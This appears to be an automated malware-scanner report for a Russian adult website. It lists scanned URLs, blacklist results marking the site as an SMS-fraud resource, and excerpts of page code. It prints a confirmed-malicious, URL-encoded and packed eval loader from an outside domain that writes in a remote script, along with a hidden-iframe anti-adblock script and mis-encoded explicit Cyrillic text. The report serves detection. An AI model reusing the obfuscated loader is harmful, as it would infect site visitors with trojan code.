New scan:

Malware Scanner report for pizda.devfot.ru

Malicious/Suspicious/Total urls checked
1/4/15
5 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as SMS-fraud resource.

The website "pizda.devfot.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pizda.devfot.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pizda.devfot.ru/

Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://pizda.devfot.ru/
200 OK
Content-Length: 8507
Content-Type: text/html
suspicious
Page code contains blacklisted domain: fetish.devfot.ru

...[9053 bytes skipped]...
íèõ ïèçäà âîëîñàòàÿ</font></td>
</tr>
<tr>
<td align="center" colspan="2">

</td>
</tr>
<tr>
<td colspan="3" align="center"> <a href="http://www.devfot.ru/"><span style="text-decoration: none">Ôîòî äåâóøåê</span></a>
</td>
<tr>
<td colspan="3" align="center"> <a href="http://fetish.devfot.ru/"><span style="text-decoration: none">Ôåòèø</span></a>
</td>
</tr>
<tr>
<td colspan="4" align="center">&nbsp;</td>
</tr>
<tr>
<td colspan="4" align="center"><font size="1" face="Arial">Áîëüøèå è ìàëåíüêèå ï¸çäû äåâóøåê<br>
<a href="../"><span style="text-decoration: none">Ôîòî ïèçäû</span></a>
<a href="../"><
...[1511 bytes skipped]...

http://ttt2.t64.ru/9ef297wr5zx5s4jjuwiae45guczj92u4h3y8pg9xg
200 OK
Content-Length: 5900
Content-Type: text/javascript
clean
http://pizda.devfot.ru/../
400 Bad Request
Content-Length: 1396
Content-Type: text/html
clean
http://pizda.devfot.ru/test404page.js
404 Not Found
Content-Length: 1392
Content-Type: text/html
clean
http://pizda.devfot.ru/manda6/index.php?event=showimg&msnum=94932
200 OK
Content-Length: 1319
Content-Type: text/html
clean
http://ttt2.t64.ru/60gzd6bhtlp50espnzuvid5nc3jp0f
200 OK
Content-Length: 5893
Content-Type: text/javascript
clean
http://pizda.devfot.ru/manda6/index.php?event=showimg&msnum=69087
200 OK
Content-Length: 1319
Content-Type: text/html
clean
http://pizda.devfot.ru/manda6/index.php?event=showimg&msnum=33475
200 OK
Content-Length: 1319
Content-Type: text/html
clean
http://pizda.devfot.ru/manda6/index.php?event=showimg&msnum=86253
200 OK
Content-Length: 4668
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

...[2003 bytes skipped]...
Element|top|5px||AdBlock|true||1px|warningMessage|width|div|body|is_ru|color|ru|if|getElementById||20px||zd||navigator|to|000|solid|height|100|xd|gradient|backgroundImage|opacity|linear|display|parentNode|stop|FAFAFA|background|removeChild|it|200px|fixed|position|zIndex|border|none|has|lang|detected|ShowAdbblock|E3E3E3|bottom|text_detected|false|src|id|innerHTML|padding|else|uk|15px|fontSize|text_detected_title|undefined|page|UA|free|continue|iframe|refresh|the|img|52mp|for|php|adhandler|ads|banner|index|enjoying|block|offer|Please|browser|turn|ru_UA|off|your|in|switch|userLanguage|default|been|experience|jpg|uk_UA|Disable|browserLanguage|now|language|text_disable|RU|everything|this|site|then|100001|webkit|moz|333333|lineHeight|11px|MozBorderTopRightRadius|borderTopRightRadius|borderRadius|ad_height|borderTopLeftRadius|MozBorderTopLeftRadius|9px|borderBottom|className|indexOf|visibility|hidden|clientHeight|CCCCCC|borderTop|EAEAEA|
...[216 bytes skipped]...

Decoded script:

...[371 bytes skipped]...
åêëàìû, ïî òèïó AdBlock.':'AdBlock has been detected in your browser. Please turn it off to experience everything this site has to offer.'}function text_detected_title(){return is_ru()?'Îáíàðóæåí AdBlock.':'AdBlock detected.'}function text_disable(){return is_ru()?'Îòêëþ÷èòå AdBlock':'Disable AdBlock now, then refresh the page to continue enjoying it for free.'}var v=false;var z=undefined;var x=undefined;function k(){z=document.createElement('iframe');x=document.createElement('img');z.id='zd';z.src='/52mp/index.php/adhandler/';z.style.display='block';z.style.border='none';x.id='xd';x.src='/ads/banner.jpg?ad_height=300&adzone=100&adserver=1&adType=32';x.style.width=z.style.width='1px';x.style.height=z.style.height='1px';x.style.top=z.style.top='-1951px';x.style.left=z.style.left='-1052px';document.body.appendChild(z);document.body.appendChild(x);setTimeout(h,500)}function ShowAdbblock(){var overlay=document.createEleme
...[5809 bytes skipped]...

http://nakfot.ru/1oneund_c.js
200 OK
Content-Length: 1213
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

j="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28qir%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bqir%3Dqir.re
... 213 bytes are skipped ...
%205%3D%5C%5C%223%2F1%5C%5C%22%20l%3D%5C%5C%22b-i%5C%5C%22%20j%22%2B%22%3D%5C%5C%22k%3A%2F%2Fh.g%22%2B%22c%2Fd.e%22%2B%22f%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C22%2C22%2C%27script%7CJavaScript%7Clanguage%7Ctext%7C044428%7Ctype%7Ctm%7Cdocument%7Cwrite%7Cizs%7C633%7Cwindows%7Cm%7Cj65%7Cp%7Chp%7Cco%7Cmekadr%7C1251%7Csrc%7Chttp%7Ccharset%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";j=j.replace(/â/g,"2C");j=j.replace(/ã/g,"7C");j=j.replace(/ä/g,"5C");document.write(unescape(j));

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://watrz.com/j100.php
200 OK
Content-Length: 2
Content-Type: text/html
clean
http://pizda.devfot.ru/manda6/../manda6/
200 OK
Content-Length: 13762
Content-Type: text/html
clean
http://pizda.devfot.ru/manda6/../manda6/../
200 OK
Content-Length: 8507
Content-Type: text/html
suspicious
Page code contains blacklisted domain: fetish.devfot.ru

...[9053 bytes skipped]...
íèõ ïèçäà âîëîñàòàÿ</font></td>
</tr>
<tr>
<td align="center" colspan="2">

</td>
</tr>
<tr>
<td colspan="3" align="center"> <a href="http://www.devfot.ru/"><span style="text-decoration: none">Ôîòî äåâóøåê</span></a>
</td>
<tr>
<td colspan="3" align="center"> <a href="http://fetish.devfot.ru/"><span style="text-decoration: none">Ôåòèø</span></a>
</td>
</tr>
<tr>
<td colspan="4" align="center">&nbsp;</td>
</tr>
<tr>
<td colspan="4" align="center"><font size="1" face="Arial">Áîëüøèå è ìàëåíüêèå ï¸çäû äåâóøåê<br>
<a href="../"><span style="text-decoration: none">Ôîòî ïèçäû</span></a>
<a href="../"><
...[1511 bytes skipped]...

http://pizda.devfot.ru/manda6/../manda6/../../
400 Bad Request
Content-Length: 1396
Content-Type: text/html
clean
http://pizda.devfot.ru/manda6/../manda6/../manda6/index.php?event=showimg&msnum=26370
200 OK
Content-Length: 4668
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

...[2003 bytes skipped]...
Element|top|5px||AdBlock|true||1px|warningMessage|width|div|body|is_ru|color|ru|if|getElementById||20px||zd||navigator|to|000|solid|height|100|xd|gradient|backgroundImage|opacity|linear|display|parentNode|stop|FAFAFA|background|removeChild|it|200px|fixed|position|zIndex|border|none|has|lang|detected|ShowAdbblock|E3E3E3|bottom|text_detected|false|src|id|innerHTML|padding|else|uk|15px|fontSize|text_detected_title|undefined|page|UA|free|continue|iframe|refresh|the|img|52mp|for|php|adhandler|ads|banner|index|enjoying|block|offer|Please|browser|turn|ru_UA|off|your|in|switch|userLanguage|default|been|experience|jpg|uk_UA|Disable|browserLanguage|now|language|text_disable|RU|everything|this|site|then|100001|webkit|moz|333333|lineHeight|11px|MozBorderTopRightRadius|borderTopRightRadius|borderRadius|ad_height|borderTopLeftRadius|MozBorderTopLeftRadius|9px|borderBottom|className|indexOf|visibility|hidden|clientHeight|CCCCCC|borderTop|EAEAEA|
...[216 bytes skipped]...

Decoded script:

...[371 bytes skipped]...
åêëàìû, ïî òèïó AdBlock.':'AdBlock has been detected in your browser. Please turn it off to experience everything this site has to offer.'}function text_detected_title(){return is_ru()?'Îáíàðóæåí AdBlock.':'AdBlock detected.'}function text_disable(){return is_ru()?'Îòêëþ÷èòå AdBlock':'Disable AdBlock now, then refresh the page to continue enjoying it for free.'}var v=false;var z=undefined;var x=undefined;function k(){z=document.createElement('iframe');x=document.createElement('img');z.id='zd';z.src='/52mp/index.php/adhandler/';z.style.display='block';z.style.border='none';x.id='xd';x.src='/ads/banner.jpg?ad_height=300&adzone=100&adserver=1&adType=32';x.style.width=z.style.width='1px';x.style.height=z.style.height='1px';x.style.top=z.style.top='-1951px';x.style.left=z.style.left='-1052px';document.body.appendChild(z);document.body.appendChild(x);setTimeout(h,500)}function ShowAdbblock(){var overlay=document.createEleme
...[5809 bytes skipped]...


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: pizda.devfot.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 07:57:10 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.4.23
Second query (visit from search engine):
GET / HTTP/1.1
Host: pizda.devfot.ru
Referer: http://www.google.com/search?q=pizda.devfot.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.